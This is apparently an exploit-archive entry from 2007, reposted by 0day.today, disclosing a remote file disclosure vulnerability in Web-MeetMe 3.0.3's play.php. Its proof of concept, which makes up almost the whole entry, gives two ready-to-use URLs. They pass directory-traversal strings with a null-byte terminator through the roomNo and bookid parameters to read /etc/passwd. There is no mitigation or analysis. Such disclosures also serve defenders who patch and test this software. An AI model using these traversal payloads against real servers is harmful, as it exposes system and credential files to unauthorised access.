id: 2328
date: 11/29/2007
title: Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability
author: Evil.Man
cves: 

================================================================
Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability
================================================================



/--------------------------------------------------------------------------\
|Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability          |
|POC :                                                                     |
| Web-MeetMe_v3.0.3/play.php?roomNo=../../../../../../../../etc/passwd%00  |
| Web-MeetMe_v3.0.3/play.php?bookid=../../../../../../../../etc/passwd%00  |
|Discovered by : Evil.Man                                                  |
|Home Page : Tryag.Com/cc                                                  |
|Email : Evil.Man                                                          |
\--------------------------------------------------------------------------/



#  0day.today [2023-03-21]  #